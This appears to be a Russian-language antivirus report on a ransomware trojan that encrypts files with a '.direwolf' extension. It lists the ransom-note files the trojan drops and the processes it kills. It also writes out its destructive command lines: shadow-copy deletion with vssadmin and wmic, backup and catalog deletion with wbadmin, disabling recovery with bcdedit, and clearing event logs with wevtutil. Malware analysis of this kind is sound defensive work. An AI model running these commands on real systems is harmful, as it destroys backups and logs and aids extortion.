Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие файлы на съемном носителе
- <Имя диска съемного носителя>:\howtorecoveryfiles.txt
- <Имя диска съемного носителя>:\1189.jpeg
- <Имя диска съемного носителя>:\1189.jpg
- <Имя диска съемного носителя>:\13.jpeg
- <Имя диска съемного носителя>:\13.jpg
- <Имя диска съемного носителя>:\1sm_price.xls
- <Имя диска съемного носителя>:\1sm_price.zip
- <Имя диска съемного носителя>:\2.jpg
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Обновления системы (Windows Update)
блокирует:
- Компонент восстановления системы (SR)
удаляет теневые копии разделов.
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /F /IM wxServerView.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sqlmangr.exe
- '<SYSTEM32>\taskkill.exe' /F /IM RAgui.exe
- '<SYSTEM32>\taskkill.exe' /F /IM supervise.exe
- '<SYSTEM32>\taskkill.exe' /F /IM Culture.exe
- '<SYSTEM32>\taskkill.exe' /F /IM Defwatch.exe
- '<SYSTEM32>\taskkill.exe' /F /IM httpd.exe
- '<SYSTEM32>\taskkill.exe' /F /IM wsa_service.exe
- '<SYSTEM32>\taskkill.exe' /F /IM synctime.exe
- '<SYSTEM32>\taskkill.exe' /F /IM vxmon.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sqlbrowser.exe
- '<SYSTEM32>\taskkill.exe' /F /IM memtas.exe
- '<SYSTEM32>\taskkill.exe' /F /IM tomcat6.exe
- '<SYSTEM32>\taskkill.exe' /F /IM Sqlservr.exe
- '<SYSTEM32>\taskkill.exe' /F /IM agntsvc.exe
- '<SYSTEM32>\taskkill.exe' /F /IM dbeng50.exe
- '<SYSTEM32>\taskkill.exe' /F /IM dbsnmp.exe
- '<SYSTEM32>\taskkill.exe' /F /IM dbsrv12.exe
- '<SYSTEM32>\taskkill.exe' /F /IM encsvc.exe
- '<SYSTEM32>\taskkill.exe' /F /IM excel.exe
- '<SYSTEM32>\taskkill.exe' /F /IM firefox.exe
- '<SYSTEM32>\taskkill.exe' /F /IM vss.exe
- '<SYSTEM32>\taskkill.exe' /F /IM infopath.exe
- '<SYSTEM32>\taskkill.exe' /F /IM isqlplussvc.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msaccess.exe
- '<SYSTEM32>\taskkill.exe' /f /pid 768
- '<SYSTEM32>\taskkill.exe' /F /IM mspub.exe
- '<SYSTEM32>\taskkill.exe' /F /IM mydesktopqos.exe
- '<SYSTEM32>\taskkill.exe' /F /IM mydesktopservice.exe
- '<SYSTEM32>\taskkill.exe' /F /IM ocautoupds.exe
- '<SYSTEM32>\taskkill.exe' /F /IM ocomm.exe
- '<SYSTEM32>\taskkill.exe' /F /IM ocssd.exe
- '<SYSTEM32>\taskkill.exe' /F /IM onenote.exe
- '<SYSTEM32>\taskkill.exe' /F /IM oracle.exe
- '<SYSTEM32>\taskkill.exe' /F /IM outlook.exe
- '<SYSTEM32>\taskkill.exe' /F /IM powerpnt.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sqbcoreservice.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sql.exe
- '<SYSTEM32>\taskkill.exe' /F /IM steam.exe
- '<SYSTEM32>\taskkill.exe' /F /IM tbirdconfig.exe
- '<SYSTEM32>\taskkill.exe' /F /IM thebat.exe
- '<SYSTEM32>\taskkill.exe' /F /IM thunderbird.exe
- '<SYSTEM32>\taskkill.exe' /F /IM visio.exe
- '<SYSTEM32>\taskkill.exe' /F /IM WinSAT.exe
- '<SYSTEM32>\taskkill.exe' /F /IM winword.exe
- '<SYSTEM32>\taskkill.exe' /F /IM wordpad.exe
- '<SYSTEM32>\taskkill.exe' /F /IM onedrive.exe
- '<SYSTEM32>\taskkill.exe' /F /IM wrapper.exe
- '<SYSTEM32>\taskkill.exe' /F /IM xfssvccon.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sqlagent.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sqlwriter.exe
- '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeIS.exe
- '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeTransport.exe
- '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailboxAssistants.exe
- '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeRepl.exe
- '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeRPC.exe
- '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeServiceHost.exe
- '<SYSTEM32>\taskkill.exe' /F /IM notepad++.exe
- '<SYSTEM32>\taskkill.exe' /F /IM notepad.exe
- '<SYSTEM32>\taskkill.exe' /f /pid 0
- '<SYSTEM32>\taskkill.exe' /f /pid 1932
Запускает большое число процессов
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\wbengine.exe
- <SYSTEM32>\vds.exe
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\svchost.exe
следующие пользовательские процессы:
- firefox.exe
Изменения в файловой системе
Создает следующие файлы
- C:\howtorecoveryfiles.txt
- C:\msocache\howtorecoveryfiles.txt
- D:\howtorecoveryfiles.txt
- D:\$recycle.bin\howtorecoveryfiles.txt
- nul
- D:\$recycle.bin\s-1-5-21-3691498038-2086406363-2140527554-1000\howtorecoveryfiles.txt
- C:\perflogs\howtorecoveryfiles.txt
- C:\perflogs\admin\howtorecoveryfiles.txt
- C:\recovery\howtorecoveryfiles.txt
- C:\recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\howtorecoveryfiles.txt
- C:\users\howtorecoveryfiles.txt
- C:\users\default\howtorecoveryfiles.txt
- C:\users\default\desktop\howtorecoveryfiles.txt
- C:\users\default\documents\howtorecoveryfiles.txt
- C:\users\default\downloads\howtorecoveryfiles.txt
- C:\users\default\favorites\howtorecoveryfiles.txt
- C:\users\default\links\howtorecoveryfiles.txt
- C:\users\default\music\howtorecoveryfiles.txt
- C:\users\default\pictures\howtorecoveryfiles.txt
- C:\users\default\saved games\howtorecoveryfiles.txt
- C:\users\default\videos\howtorecoveryfiles.txt
- C:\users\public\howtorecoveryfiles.txt
- C:\users\public\desktop\howtorecoveryfiles.txt
- C:\users\public\documents\howtorecoveryfiles.txt
- C:\users\public\downloads\howtorecoveryfiles.txt
- C:\users\public\favorites\howtorecoveryfiles.txt
- C:\users\public\libraries\howtorecoveryfiles.txt
- C:\users\public\music\howtorecoveryfiles.txt
- C:\users\public\music\sample music\howtorecoveryfiles.txt
- C:\users\public\pictures\howtorecoveryfiles.txt
- C:\users\public\pictures\sample pictures\howtorecoveryfiles.txt
- C:\users\public\recorded tv\howtorecoveryfiles.txt
- C:\users\public\recorded tv\sample media\howtorecoveryfiles.txt
- C:\users\public\videos\howtorecoveryfiles.txt
- C:\users\public\videos\sample videos\howtorecoveryfiles.txt
- %HOMEPATH%\howtorecoveryfiles.txt
Изменяет следующие файлы
- <Имя диска съемного носителя>:\1189.jpeg.direwolf
- <Имя диска съемного носителя>:\1189.jpg.direwolf
- <Имя диска съемного носителя>:\13.jpeg.direwolf
- <Имя диска съемного носителя>:\13.jpg.direwolf
Изменяет расширения файлов пользовательских данных (Trojan.Encoder).
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
- ClassName: '' WindowName: 'View Available Networks'
Запускает на исполнение
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled
- '<SYSTEM32>\cmd.exe' -Command "/c start vssadmin delete shadows /all /quiet"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-WmiObject -Class win32_service -Filter \"name = 'eventlog'\" | select -exp ProcessId"
- '<SYSTEM32>\sc.exe' config vss start= disabled
- '<SYSTEM32>\cmd.exe' -Command "/c start wmic shadowcopy delete /nointeractive"
- '<SYSTEM32>\cmd.exe' -Command "/c start wbadmin stop job -quiet"
- '<SYSTEM32>\wbadmin.exe' stop job -quiet"
- '<SYSTEM32>\wbengine.exe'
- '<SYSTEM32>\vds.exe'
- '<SYSTEM32>\cmd.exe' -Command "/c start wbadmin disable backup -quiet"
- '<SYSTEM32>\wbadmin.exe' disable backup -quiet"
- '<SYSTEM32>\cmd.exe' -Command "/c start wbadmin delete backup -keepVersions:0 -quiet"
- '<SYSTEM32>\wbadmin.exe' delete backup -keepVersions:0 -quiet"
- '<SYSTEM32>\cmd.exe' -Command "/c start wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet"
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet"
- '<SYSTEM32>\cmd.exe' -Command "/c start wbadmin delete catalog -quiet"
- '<SYSTEM32>\wbadmin.exe' delete catalog -quiet"
- '<SYSTEM32>\cmd.exe' -Command "/c start bcdedit /set {default} recoveryenabled No"
- '<SYSTEM32>\cmd.exe' -Command "/c start bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures"
- '<SYSTEM32>\cmd.exe' -Command "/c start wevtutil cl Application"
- '<SYSTEM32>\wevtutil.exe' cl Application"
- '<SYSTEM32>\cmd.exe' -Command "/c start wevtutil cl system"
- '<SYSTEM32>\wevtutil.exe' cl system"
- '<SYSTEM32>\cmd.exe' -Command "/c start wevtutil cl security"
- '<SYSTEM32>\wevtutil.exe' cl security"
- '<SYSTEM32>\cmd.exe' -Command "/c start wevtutil cl setup"
- '<SYSTEM32>\wevtutil.exe' cl setup"
- '<SYSTEM32>\cmd.exe' -Command "/c start taskkill /f /pid 768 "
- '<SYSTEM32>\cmd.exe' -Command "/c start taskkill /f /pid 0 "
- '<SYSTEM32>\cmd.exe' -Command "/c start taskkill /f /pid 1932 "
